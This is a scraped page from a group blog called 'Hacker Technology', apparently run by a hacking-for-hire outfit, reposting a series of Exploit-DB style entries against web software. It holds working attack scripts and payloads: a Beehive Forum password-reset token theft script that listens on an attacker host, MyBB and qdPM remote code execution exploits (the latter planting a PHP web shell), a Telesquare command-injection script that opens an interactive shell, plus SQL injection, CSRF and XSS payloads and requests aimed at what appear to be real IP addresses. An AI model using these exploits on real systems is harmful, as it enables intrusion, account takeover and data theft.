Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863128879

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: Beehive Forum - Account Takeover
# Date:08/05/2022.
# Exploit Author: Pablo Santiago
# Vendor Homepage: https://www.beehiveforum.co.uk/
# Software Link: https://sourceforge.net/projects/beehiveforum/
# Version: 1.5.2
# Tested on: Kali Linux and Ubuntu 20.0.4
# CVE N/A
# PoC: https://imgur.com/a/hVlgpCg

# Vulnerability: In the functionality "forgot password", it's possible to
modify the Header "Host", #injecting malicious host, allowing stealing the
token and resetting the password from a victim.#(Requires user interaction)

import requests
from bs4 import BeautifulSoup
import socket
import sys
import urllib.parse
import random
import string

endpoint = sys.argv[1]
lhost = sys.argv[2]
lport = int(sys.argv[3])
hostheader = f'{lhost}:{lport}'
url_forgot = f'http://{endpoint}/forum/forgot_pw.php'
url_change = f'http://{endpoint}/forum/change_pw.php'

def init_req():
    session = requests.Session()
    r = session.get(url_forgot)
    cookie = session.cookies.get_dict()
    cookie = cookie['sess_hash']
    soup = BeautifulSoup(r.text, 'lxml')
    hash_request = soup.input['id']
    csrf_token = soup.input['value']
    return hash_request, csrf_token, cookie

def forgot_req(hash_request: str, csrf_token: str, cookie: str):

    headers= {
        'Host': hostheader,
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0)
Gecko/20100101 Firefox/97.0',
        'Accept-Language': 'es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3',
        'Cookie' : 'sess_hash=' + cookie
    }

    data = {
        hash_request : csrf_token,
        'webtag' : 'TEST',
        'logon' : 'admin',
        'request' : 'Request'
    }

    r = requests.post(url_forgot, headers=headers, data=data)
    if('You should shortly receive an e-mail containing instructions for
resetting your password' in r.text):
        print('')
        print('[*] A mail has been sent to the victim')
        socket_req()
    else:
        print('[*] The mail has not been sent')

def socket_req():

    print(f"[*] Listening on port {lport}...." )
    print('[*] Waitting the victim clicks in the malicious link\n')
    s = socket.socket()
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.bind((lhost, lport))
    s.listen()
    (sock_c, _) = s.accept()
    get_request = sock_c.recv(4096)
    user_token = urllib.parse.unquote_plus(get_request.split(b"
HTTP")[0][-13:].decode("UTF-8"))

    print("[*] Stole token: " + user_token)
    change_pw(user_token)

def change_pw(user_token: str):
    c = string.ascii_letters + string.digits
    password = ''.join(random.choice(c) for _ in range(6))
    hash_request, csrf_token, cookie = init_req()
    headers= {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0)
Gecko/20100101 Firefox/97.0',
        'Accept-Language': 'es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3',
        'Cookie' : 'sess_hash=' + cookie
    }
    data = {
        hash_request : csrf_token,
        'webtag' : 'TEST',
        'u' : '1',
        'h' : user_token,
        'pw' : password,
        'cpw' : password,
        'save' : 'Save'
    }

    r = requests.post(url_change, headers=headers, data=data)
    if('Your password has been changed' in r.text):
        print(f'[*] The password has been changed to: {password}')

    else:
        print('[*] The password has been changed')


hash_request, csrf_token, cookie = init_req()
forgot_req(hash_request, csrf_token, cookie)
HireHackking 
# Exploit Title: MyBB 1.8.29 - Remote Code Execution (RCE) (Authenticated)
# Date: 2022-05-08
# Exploit Author: Altelus
# Vendor Homepage: https://mybb.com/
# Software Link: https://github.com/mybb/mybb/releases/tag/mybb_1829
# Version: MyBB 1.8.29 
# Tested on: Linux
# CVE : CVE-2022-24734

# An RCE can be obtained on MyBB's Admin CP in Configuration -> Add New Setting. 
# The user must have a rights to add or update setting. This is tested on MyBB 1.8.29.
# The vulnerability may have existed as early as 1.4.0 since this 
# 'php' checking is introduced in 1.4.0 (https://github.com/mybb/mybb/security/advisories/GHSA-876v-gwgh-w57f) 

import requests
import argparse
import random
import string
from base64 import b64decode
from bs4 import BeautifulSoup


def login(username, password):

    data = {
        "username" : username,
        "password" : password,
        "do" : "login"
    }

    login_txt = r_client.post(host + "/admin/index.php", data=data).text

    if "The username and password combination you entered is invalid" in login_txt:
        print("[-] Login failure. Incorrect credentials supplied")
        exit(0)

    print("[+] Login successful!")


def add_settings(cmd, raw_cmd=""):

    config_settings_txt = r_client.get(host + "/admin/index.php?module=config-settings&action=add").text

    if "Access Denied" in config_settings_txt:
        print("[-] Supplied user doesn't have the rights to add a setting")
        exit(0)

    print("[*] Adding a malicious settings...")

    soup = BeautifulSoup(config_settings_txt, "lxml")
    my_post_key = soup.find_all("input", {"name" : "my_post_key"})[0]['value']

    rand_string = get_rand_string()

    if raw_cmd != "":
        extra = "\" . system('{}') .\"".format(raw_cmd)
    else:
        extra = "\" . system('{} | base64 -w 0') .\"".format(cmd)

    data = {
        "my_post_key" : my_post_key,
        "title" : "An innocent setting",
        "description" : "An innocent description",
        "gid" : 1,
        "disporder" : "",
        "name" : rand_string,
        "type" : "\tphp",
        "extra" : extra,
        "value" : "An innocent value" 
    }

    post_setting = r_client.post(host + "/admin/index.php?module=config-settings&action=add",data=data,allow_redirects=False)

    if post_setting.status_code != 302:
        soup = BeautifulSoup(post_setting.text, "lxml")
        error_txt = soup.find_all("div", {"class" : "error"})[0].text
        print("[-] Exploit didn't work. Reason: '{}'".format(error_txt))
        exit(0)

    print("[+] Malicious post settings accepted!")
    return rand_string

def get_rand_string(length=20):
    
    return ''.join(random.choice(string.ascii_letters) for i in range(length))

def get_cmd_result(ident_string, raw_cmd=""):

    conf_settings_list = r_client.get(host + "/admin/index.php?module=config-settings&action=change").text

    soup = BeautifulSoup(conf_settings_list, "lxml")
    row_setting = soup.find_all("tr", {"id" : "row_setting_{}".format(ident_string)})[0]

    cmd_result = row_setting.find_all("div", {"class" : "form_row"})[0].text

    if raw_cmd == "":
        cmd_result = b64decode(cmd_result[2:]).decode()

    print("[+] Result: {}".format(str(cmd_result)))

parser = argparse.ArgumentParser()

parser.add_argument('--username', required=True, help="MyBB Admin CP username")
parser.add_argument('--password', required=True, help="MyBB Admin CP password")
parser.add_argument('--host', required=True, help="e.g. http://target.website.local, http://10.10.10.10, http://192.168.23.101:8000")
parser.add_argument('--cmd', required=False, help="Command to run")
parser.add_argument('--raw_cmd', required=False, help="Command to run directly into system()")
args = parser.parse_args()

username = args.username
password = args.password
host = args.host

cmd = "id" if args.cmd == None else args.cmd
raw_cmd = "" if args.raw_cmd == None else args.raw_cmd

r_client = requests.Session()

login(username, password)
ident_string = add_settings(cmd, raw_cmd=raw_cmd)
get_cmd_result(ident_string, raw_cmd=raw_cmd)
HireHackking 
# Exploit Title: Joomla Plugin SexyPolling 2.1.7 - SQLi
# Google Dork: intext:"Powered by Sexy Polling"
# Date: 2022-02-08
# Exploit Author: Wolfgang Hotwagner
# Vendor Homepage: https://2glux.com/projects/sexypolling
# Software Link: https://2glux.com/downloads/files/free/sexypolling_pack_2.1.7_2glux.com.zip
# Version: all versions below version 2.1.8
# Tested on: Debian Bullseye




SexyPolling SQL Injection

====================

| Identifier: | AIT-SA-20220208-01|
| Target: | Sexy Polling ( Joomla Extension) |
| Vendor: | 2glux |
| Version: | all versions below version 2.1.8 |
| CVE: | Not yet |
| Accessibility: | Remote |
| Severity: | Critical |
| Author: | Wolfgang Hotwagner (AIT Austrian Institute of Technology) |


Summary

========

[Sexy Polling is a Joomla Extension for votes.](https://2glux.com/projects/sexypolling). In all versions below 2.1.8 an unauthenticated attacker could execute arbitrary SQL commands by sending crafted POST-parameters to poll.php.


Vulnerability Description

====================

In the vote.php file, the POST parameters min_date and max_date are insufficiently checked and sanitized. An attacker can use these parameters to send payloads for sql injections.

In lines 74 and 75 in the *site/vote.php* code, the parameters are assigned without being checked:

```
$min_date_sent = isset($_POST['min_date']) ? $_POST['min_date'].' 00:00:00' : '';
$max_date_sent = isset($_POST['max_date']) ? $_POST['max_date'].' 23:59:59' : '';
```

These are later used unfiltered by the WHERE clause:

```
$query_toal = "SELECT
COUNT(sv.`id_answer`) total_count,
MAX(sv.`date`) max_date,
MIN(sv.`date`) min_date
FROM
`#__sexy_votes` sv
JOIN
`#__sexy_answers` sa ON sa.id_poll = '$polling_id'
AND
sa.published = '1'
WHERE
sv.`id_answer` = sa.id";

//if dates are sent, add them to query
if ($min_date_sended != '' && $max_date_sended != '')
$query_toal .= " AND sv.`date` >= '$min_date_sended' AND sv.`date` <= '$max_date_sended' ";
```

Proof Of Concept

==============

To check a system for vulnerability, modify the POST request so that the min_date parameter contains a single apostrophe.

HTTP-Request:
```
POST /components/com_sexypolling/vote.php HTTP/1.1

Host: joomla-server.local
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
HTTP_X_REAL_IP: 1.1.1.1
Content-Length: 193
Origin: joomla-server.local
Connection: close
Referer: joomla-server.local/index.php/component/search/
Cookie: 3f7d6b4d84916c70a46aaf5501d04983=iuddgl57g75v5gruopdqh0cgd6

polling_id=1&answer_id[]=3&dateformat=digits&min_date=2021-12-07'&max_date=2021-12-14&country_name=-&country_code=-&city_name=-&region_name=-&voting_period=24&ae9a061e2170d406fb817b9ec0c42918=1
```

The HTTP-Resoonse contains a mysql error:

```
HTTP/1.1 500 Internal Server Error
Date: Wed, 15 Dec 2021 10:27:40 GMT
Server: Apache/2.4.41 (Ubuntu)
Set-Cookie: PHPSESSID=39p4ql2oj0b45opsf6p105tfcf; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: sexy_poll_1=1639564060; expires=Thu, 16-Dec-2021 10:27:40 GMT; Max-Age=86400; path=/
Content-Length: 4768
Connection: close
Content-Type: application/json

<!DOCTYPE html>
<html lang="en-gb" dir="ltr">
<head>
<meta charset="utf-8" />
<title>Error: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near &#039;00:00:00&#039; AND sv.`date` <= &#039;2021-12-14 23:59:59&#039;&#039; at line 12</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link href="https://fonts.googleapis.com/css?family=Open+Sans" rel="stylesheet" />
```

Vulnerable Versions
================
All versions below version 2.1.8

Tested Versions
=============
Sexy Polling ( Joomla Extension) 2.1.7

Impact
======
An unauthenticated attacker could inject and execute SQL commands on the database.

Mitigation
=========
Sexy Polling 2.1.8 fixed that issue

Vendor Contact Timeline
====================
| 2021-12-14 | Unable to find a contact of the vendor |
| 2021-12-15 | Contacting Joomla Security Strike Team |
| 2021-12-29 | Answer from the Joomla Security Strike Team that they will investigate the problem. |
| 2022-01-01 | Sexy Polling releases 2.1.8 |
| 2022-04-08 | Public Disclosure |

*We would like to note that the communication about this issue was weak. The contact-form of the maintainer of sexy_polling was broken and there was no other contact published. The Joomla Security Strike Team let us know that they will investigate, but they did not send any updates about the progress.*

Advisory URL
===========
[https://www.ait.ac.at/ait-sa-20220208-01-sexypolling](https://www.ait.ac.at/ait-sa-20220208-01-sexypolling)
HireHackking 
# Exploit Title: WordPress Plugin stafflist 3.1.2 - SQLi (Authenticated)
# Date: 05-02-2022
# Exploit Author: Hassan Khan Yusufzai - Splint3r7
# Vendor Homepage: https://wordpress.org/plugins/stafflist/
# Version: 3.1.2
# Tested on: Firefox
# Contact me: h [at] spidersilk.com

# Vulnerable Code:

$w = (isset($_GET['search']) && (string) trim($_GET['search'])!="" ?
...
	$where = ($w ? "WHERE LOWER(lastname) LIKE '%{$w}%' OR
			LOWER(firstname) LIKE '%{$w}%' OR
			LOWER(department)  LIKE '%{$w}%' OR
			LOWER(email) LIKE '%{$w}%'" : "");


# Vulnerable URL

http://localhost:10003/wp-admin/admin.php?page=stafflist&search=[SQLI]

# POC

```
sqlmap -u 'http://localhost:10003/wp-admin/admin.php?page=stafflist&search=test*'
--cookie="wordpress_cookies_paste_here"
```

# POC Image

https://prnt.sc/AECcFRHhe2ib
HireHackking
Exploit Title: WordPress Plugin Blue Admin 21.06.01 - Cross-Site Request Forgery (CSRF) Date: 2021-07-27 Exploit Author : WordPress Plugin Blue Admin 21.06.01 - Cross-Site Request Forgery (CSRF) Vendor Homepage : https://wpscan.com/plugin/blue-admi Version : <= 21.06.01 Tested on: windows 10 Professional CVE : CVE-2021-24581 <html> <body> <form action="http://example.com/wp-admin/admin.php?page=blue-admin&tab=blue_admin_login_page" method="POST" enctype="multipart/form-data"> <input type="hidden" name="ba_lp_attr[fm_bg_color]" value="FFFFFF" /> <input type="hidden" name="ba_lp_attr[fm_color]" value="777777" /> <input type="hidden" name="ba_lp_attr[logo_text]" value='WP"><script>alert(/XSS/)</script>' /> <input type="hidden" name="ba_lp_attr[logo_url]" value="https://example.com" /> <input type="hidden" name="ba_lp_attr[logo_img]" value="" /> <input type="hidden" name="ba_lp_attr[bg_color]" value="EEEEEE" /> <input type="hidden" name="ba_lp_attr[text_color]" value="222222" /> <input type="hidden" name="ba_lp_attr[bg_img]" value="" /> <input type="hidden" name="ba_lp_attr[bg_img_pos]" value="" /> <input type="hidden" name="ba_lp_attr[bg_img_rep]" value="" /> <input type="hidden" name="ba_lp_options_save" value="Save changes" /> <input type="submit" value="Submit request" /> </form> </body> </html>
HireHackking

TLR-2005KSH - Arbitrary File Upload

HACKER · %s · %s

# Exploit Title: TLR-2005KSH - Arbitrary File Upload # Date: 2022-05-11 # Shodan Dork: title:"Login to TLR-2021" # Exploit Author: Ahmed Alroky # Author Company : Aiactive # Version: 1.0.0 # Vendor home page : http://telesquare.co.kr/ # Authentication Required: No # Tested on: Windows # CVE: CVE-2021-45428 # Vulnerability Description # Due to the Via WebDAV (Web Distributed Authoring and Versioning), # on the remote server,telesquare TLR-2021 allows unauthorized users to upload # any file(e.g. asp, aspx, cfm, html, jhtml, jsp, shtml) which causes # remote code execution as well. # Due to the WebDAV, it is possible to upload the arbitrary # file utilizing the PUT method. # Proof-of-Concept # Request PUT /l6f3jd6cbf.txt HTTP/1.1 Host: 223.62.114.233:8081<http://223.62.114.233:8081/> Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Connection: close Content-Length: 10
HireHackking

TLR-2005KSH - Arbitrary File Delete

HACKER · %s · %s

# Exploit Title: TLR-2005KSH - Arbitrary File Delete # Date: 2022-05-11 # Exploit Author: Ahmed Alroky # Author Company : AIactive # Version: 1.0.0 # Vendor home page : http://telesquare.co.kr/ # Authentication Required: No # Tested on: Windows # CVE: CVE-2021-46424 # Proof-of-Concept # Request DELETE /cgi-bin/test2.txt HTTP/1.1 Host: 220.89.223.215:8083 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close
HireHackking
# Exploit Title: College Management System - 'course_code' SQL Injection (Authenticated) # Date: 2022-24-03 # Exploit Author: Eren Gozaydin # Vendor Homepage: https://code-projects.org/college-management-system-in-php-with-source-code/ # Software Link: https://download.code-projects.org/details/1c3b87e5-f6a6-46dd-9b5f-19c39667866f # Version: 1.0 # Tested on: Windows 10 Pro + PHP 8.0.11, Apache 2.4.51 # CVE: CVE-2022-28079 # References: https://nvd.nist.gov/vuln/detail/CVE-2022-28079 ------------------------------------------------------------------------------------ 1. Description: ---------------------- College Management System 1.0 allows SQL Injection via parameter 'course_code' in /College-Management-System/admin/asign-single-student-subjects.php. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 2. Proof of Concept: ---------------------- In Burpsuite intercept the request from the affected page with 'course_code' parameter and save it like poc.txt Then run SQLmap to extract the data from the database: sqlmap -r poc.txt --dbms=mysql 3. Example payload: ---------------------- boolean-based blind Payload: submit=Press&roll_no=3&course_code=-6093' OR 2121=2121 AND 'ddQQ'='ddQQ 4. Burpsuite request: ---------------------- POST /College-Management-System/admin/asign-single-student-subjects.php HTTP/1.1 Host: localhost Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-us,en;q=0.5 Cache-Control: no-cache Content-Length: 80 Content-Type: application/x-www-form-urlencoded Cookie: PHPSESSID=jhnlvntmv8q4gtgsof9l1f1hhe Referer: http://localhost/College-Management-System/admin/asign-single-student-subjects.php User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36 submit=Press&roll_no=3&course_code=Select+Course%27+OR+1%3d1+OR+%27ns%27%3d%27ns
HireHackking

T-Soft E-Commerce 4 - SQLi (Authenticated)

HACKER · %s · %s

# Exploit Title: T-Soft E-Commerce 4 - SQLi (Authenticated) # Exploit Author: Alperen Ergel # Contact: @alpernae (IG/TW) # Software Homepage: https://www.tsoft.com.tr/ # Version : v4 # Tested on: Kali Linux # Category: WebApp # Google Dork: N/A # CVE: 2022-28132 # Date: 18.02.2022 ######## Description ########################################### # # # # Step-1: Login as Admin or with privilage user # Step-2: Open burp or zap and request the {PoC REQUEST PATH} vulnerable path # Step-3: Capture the request save as .txt # Step-4: Run SQLMAP with this command 'sqlmap -r {req.txt} --dbs --level 5 --risk 3 --tamper=space2comment' --random-agent' # Step-5: Now you're be able to see the dbs for more search 'how to use sqlmap advance' # # Impact: Attacker can see the what have in database and it's big impact and attacker can stole datas... # # # ######## Proof of Concept ######################################## ========>>> REQUEST <<<========= GET /Y/Moduller/_Urun/Json.php?_dc=1646232925144&sort=kayittarihi&dir=DESC&AramaKelimesi=&AramaKriteri=UrunAdi&SatisAlt=&SatisUst= &marka=&model=&tedarikci=&AlisAlt=&AlisUst=&KdvAlt=&KdvUst=&StokAlt=&StokUst=&birim=&extra=&kategori=&Kategori=&gor=0&ind=0&yeni=0&karsila=0&ana=0&grup=&firsat=0&mercek=0&kdvGoster=0&filtre=0&video=0&xml_not_update_price=0&xml_not_update_stock=0&multi_category_sort=0&simge=&desiAlt=&desiUst=&agirlikAlt=&agirlikUst=&stokBirim=&FirsatBaslamaTarihiBas=&FirsatBaslamaTarihiSon=&FirsatBitisTarihiBas=&FirsatBitisTarihiSon=&UrunEklemeTarihiBas=&UrunEklemeTarihiSon=&havaleAlt=&havaleUst=&page=1&start=0&limit=20 HTTP/2 Host: domain.com Cookie: lang=tr; v4=on; nocache=1; TSOFT_USER=xxx@xx.com; customDashboardMapping=true; countryCode=TR; rest1SupportUser=0; nocache=1; yayinlanmaDurumuPopup=1; yayinlanmaDurumuPopupTimeout=864000; PHPSESSID=fcfa85a5603de7b64bc08eaf68bc51ca; U_TYPE_CK=131; U_TYPE_OK=c16a5320fa475530d9583c34fd356ef5; TSOFT_LOGGED=7d025a34d0526c8896d713159b0d1ffe; email=; phone=; password= Sec-Ch-Ua: "(Not(A:Brand";v="8", "Chromium";v="98" X-Requested-With: XMLHttpRequest Sec-Ch-Ua-Mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36 Sec-Ch-Ua-Platform: "Linux" Accept: */* Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://domain.com/srv/admin/products/products-v2/index Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 =============> RESULTS OF THE SQLMAP <========================== Parameter: SatisAlt (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: _dc=1646232925144&sort=kayittarihi&dir=DESC&AramaKelimesi=&AramaKriteri=UrunAdi&SatisAlt=' AND 1331=1331 AND 'RcAU'='RcAU&SatisUst=&marka=&model=&tedarikci=&AlisAlt=&AlisUst=&KdvAlt=&KdvUst=&StokAlt=&StokUst=&birim=&extra=&kategori=&Kategori=&gor=0&ind=0&yeni=0&karsila=0&ana=0&grup=&firsat=0&mercek=0&kdvGoster=0&filtre=0&video=0&xml_not_update_price=0&xml_not_update_stock=0&multi_category_sort=0&simge=&desiAlt=&desiUst=&agirlikAlt=&agirlikUst=&stokBirim=&FirsatBaslamaTarihiBas=&FirsatBaslamaTarihiSon=&FirsatBitisTarihiBas=&FirsatBitisTarihiSon=&UrunEklemeTarihiBas=&UrunEklemeTarihiSon=&havaleAlt=&havaleUst=&page=1&start=0&limit=20 --- back-end DBMS: MySQL 5 available databases [2]: [*] d25082_db [*] information_schema [13:05:31] [INFO] GET parameter 'SatisAlt' appears to be 'SQLite > 2.0 OR time-based blind (heavy query)' injectable
HireHackking
# Exploit Title: Survey Sparrow Enterprise Survey Software 2022 - Stored Cross-Site Scripting (XSS) # Date: May 11 2022 # Exploit Author: Pankaj Kumar Thakur # Vendor Homepage: https://surveysparrow.com/ # Software Link: https://surveysparrow.com/enterprise-survey-software/ # Version: 2022 # Tested on: Windows # CVE : CVE-2022-29727 # References: https://www.tenable.com/cve/CVE-2022-29727 https://github.com/haxpunk1337/Enterprise-Survey-Software/blob/main/Enterprise-Survey-Software%202022 #POC For Stored XSS Visit https://LOCALHOST/login?test=Javascript%26colon;%252F%252F%E2%80%A9confirm?.(document.cookie)// XSS Executed
HireHackking

Showdoc 2.10.3 - Stored Cross-Site Scripting (XSS)

HACKER · %s · %s

# Exploit Title: Showdoc 2.10.3 - Stored Cross-Site Scripting (XSS) # Exploit Author: Akshay Ravi # Vendor Homepage: https://github.com/star7th/showdoc # Software Link: https://github.com/star7th/showdoc/releases/tag/v2.10.3 # Version: <= 2.10.3 # Tested on: macOS Monterey # CVE : CVE-2022-0967 Description: Stored XSS via uploading file in .ofd format 1. Create a file with .ofd extension and add XSS Payload inside the file filename = "payload.ofd" payload = "<script>alert(1)</script>" 2. Login to showdoc v2.10.2 and go to file library Endpoint = "https://www.site.com/attachment/index" 3. Upload the payload on file library and click on the check button 4. The XSS payload will executed once we visited the URL
HireHackking

Contao 4.13.2 - Cross-Site Scripting (XSS)

HACKER · %s · %s

# Exploit Title: Contao 4.13.2 - Cross-Site Scripting (XSS) # Google Dork: NA # Date: 04/28/2022 # Exploit Author: Chetanya Sharma @AggressiveUser # Vendor Homepage: https://contao.org/en/ # Software Link: https://github.com/contao/contao/releases/tag/4.13.2 # Version: [ 4.13.2 ] # Tested on: [KALI OS] # CVE : CVE-2022-1588 # References: - https://huntr.dev/bounties/df46e285-1b7f-403c-8f6c-8819e42deb80/ - https://github.com/contao/contao/security/advisories/GHSA-m8x6-6r63-qvj2 - https://contao.org/en/security-advisories/cross-site-scripting-via-canonical-url.html --------------- Steps to reproduce: Navigate to the below URL URL: https://localhost/contao/"><svg//onload=alert(112233)>
HireHackking

qdPM 9.1 - Remote Code Execution (RCE) (Authenticated) (v2)

HACKER · %s · %s

# Exploit Title: qdPM 9.1 - Remote Code Execution (RCE) (Authenticated) # Google Dork: intitle:qdPM 9.1. Copyright © 2020 qdpm.net # Date: 2021-08-03 # Original Exploit Author: Rishal Dwivedi (Loginsoft) # Original ExploitDB ID: 47954 (https://www.exploit-db.com/exploits/47954) # Exploit Author: Leon Trappett (thepcn3rd) # Vendor Homepage: http://qdpm.net/ # Software Link: http://qdpm.net/download-qdpm-free-project-management # Version: <=1.9.1 # Tested on: Ubuntu Server 20.04 (Python 3.9.2) # CVE : CVE-2020-7246 # Exploit written in Python 3.9.2 # Tested Environment - Ubuntu Server 20.04 LTS # Path Traversal + Remote Code Execution # Exploit modification: RedHatAugust #!/usr/bin/python3 import sys import requests from lxml import html from argparse import ArgumentParser session_requests = requests.session() def multifrm(userid, username, csrftoken_, EMAIL, HOSTNAME, uservar): request_1 = { 'sf_method': (None, 'put'), 'users[id]': (None, userid[-1]), 'users[photo_preview]': (None, uservar), 'users[_csrf_token]': (None, csrftoken_[-1]), 'users[name]': (None, username[-1]), 'users[new_password]': (None, ''), 'users[email]': (None, EMAIL), 'extra_fields[9]': (None, ''), 'users[remove_photo]': (None, '1'), } return request_1 def req(userid, username, csrftoken_, EMAIL, HOSTNAME): request_1 = multifrm(userid, username, csrftoken_, EMAIL, HOSTNAME, '.htaccess') new = session_requests.post(HOSTNAME + 'index.php/myAccount/update', files=request_1) request_2 = multifrm(userid, username, csrftoken_, EMAIL, HOSTNAME, '../.htaccess') new1 = session_requests.post(HOSTNAME + 'index.php/myAccount/update', files=request_2) request_3 = { 'sf_method': (None, 'put'), 'users[id]': (None, userid[-1]), 'users[photo_preview]': (None, ''), 'users[_csrf_token]': (None, csrftoken_[-1]), 'users[name]': (None, username[-1]), 'users[new_password]': (None, ''), 'users[email]': (None, EMAIL), 'extra_fields[9]': (None, ''), 'users[photo]': ('backdoor.php', '<?php if(isset($_REQUEST[\'cmd\'])){ echo "<pre>"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo "</pre>"; die; }?>', 'application/octet-stream'), } upload_req = session_requests.post(HOSTNAME + 'index.php/myAccount/update', files=request_3) def main(HOSTNAME, EMAIL, PASSWORD): url = HOSTNAME + '/index.php/login' result = session_requests.get(url) #print(result.text) login_tree = html.fromstring(result.text) authenticity_token = list(set(login_tree.xpath("//input[@name='login[_csrf_token]']/@value")))[0] payload = {'login[email]': EMAIL, 'login[password]': PASSWORD, 'login[_csrf_token]': authenticity_token} result = session_requests.post(HOSTNAME + '/index.php/login', data=payload, headers=dict(referer=HOSTNAME + '/index.php/login')) # The designated admin account does not have a myAccount page account_page = session_requests.get(HOSTNAME + 'index.php/myAccount') account_tree = html.fromstring(account_page.content) userid = account_tree.xpath("//input[@name='users[id]']/@value") username = account_tree.xpath("//input[@name='users[name]']/@value") csrftoken_ = account_tree.xpath("//input[@name='users[_csrf_token]']/@value") req(userid, username, csrftoken_, EMAIL, HOSTNAME) get_file = session_requests.get(HOSTNAME + 'index.php/myAccount') final_tree = html.fromstring(get_file.content) backdoor = requests.get(HOSTNAME + "uploads/users/") count = 0 dateStamp = "1970-01-01 00:00" backdoorFile = "" for line in backdoor.text.split("\n"): count = count + 1 if "backdoor.php" in str(line): try: start = "\"right\"" end = " </td" line = str(line) dateStampNew = line[line.index(start)+8:line.index(end)] if (dateStampNew > dateStamp): dateStamp = dateStampNew print("The DateStamp is " + dateStamp) backdoorFile = line[line.index("href")+6:line.index("php")+3] except: print("Exception occurred") continue #print(backdoor) print('Backdoor uploaded at - > ' + HOSTNAME + 'uploads/users/' + backdoorFile + '?cmd=whoami') if __name__ == '__main__': print("You are not able to use the designated admin account because they do not have a myAccount page.\n") parser = ArgumentParser(description='qdmp - Path traversal + RCE Exploit') parser.add_argument('-url', '--host', dest='hostname', help='Project URL') parser.add_argument('-u', '--email', dest='email', help='User email (Any privilege account)') parser.add_argument('-p', '--password', dest='password', help='User password') args = parser.parse_args() # Added detection if the arguments are passed and populated, if not display the arguments if (len(sys.argv) > 1 and isinstance(args.hostname, str) and isinstance(args.email, str) and isinstance(args.password, str)): main(args.hostname, args.email, args.password) else: parser.print_help()
HireHackking

Telesquare SDT-CW3B1 1.1.0 - OS Command Injection

HACKER · %s · %s

#!/usr/bin/python3 # Exploit Title: Telesquare SDT-CW3B1 1.1.0 - OS Command Injection # Date: 24th May 2022 # Exploit Author: Bryan Leong <NobodyAtall> # Vendor Homepage: http://telesquare.co.kr/ # CVE : CVE-2021-46422 # Authentication Required: No import requests import argparse import sys from xml.etree import ElementTree def sysArgument(): ap = argparse.ArgumentParser() ap.add_argument("--host", required=True, help="target hostname/IP") args = vars(ap.parse_args()) return args['host'] def checkHost(host): url = "http://" + host print("[*] Checking host is it alive?") try: rsl = requests.get(url) print("[*] The host is alive.") except requests.exceptions.Timeout as err: raise SystemExit(err) def exploit(host): url = "http://" + host + "/cgi-bin/admin.cgi?Command=sysCommand&Cmd=" #checking does the CGI exists? rsl = requests.get(url) if(rsl.status_code == 200): print("[*] CGI script exist!") print("[*] Injecting some shell command.") #1st test injecting id command cmd = "id" try: rsl = requests.get(url + cmd, stream=True) xmlparser = ElementTree.iterparse(rsl.raw) cmdRet = [] for event, elem in xmlparser: if(elem.tag == 'CmdResult'): cmdRet.append(elem.text) except: print("[!] No XML returned from CGI script. Possible not vulnerable to the exploit") sys.exit(0) if(len(cmdRet) != 0): print("[*] There's response from the CGI script!") print('[*] System ID: ' + cmdRet[0].strip()) print("[*] Spawning shell. type .exit to exit the shell", end="\n\n") #start shell iteration while(True): cmdInput = input("[SDT-CW3B1 Shell]# ") if(cmdInput == ".exit"): print("[*] Exiting shell.") sys.exit(0) rsl = requests.get(url + cmdInput, stream=True) xmlparser = ElementTree.iterparse(rsl.raw) for event, elem in xmlparser: if(elem.tag == 'CmdResult'): print(elem.text.strip()) print('\n') else: print("[!] Something doesn't looks right. Please check the request packet using burpsuite/wireshark/etc.") sys.exit(0) else: print("[!] CGI script not found.") print(rsl.status_code) sys.exit(0) def main(): host = sysArgument() checkHost(host) exploit(host) if __name__ == "__main__": main()
HireHackking

Microweber CMS 1.2.15 - Account Takeover

HACKER · %s · %s

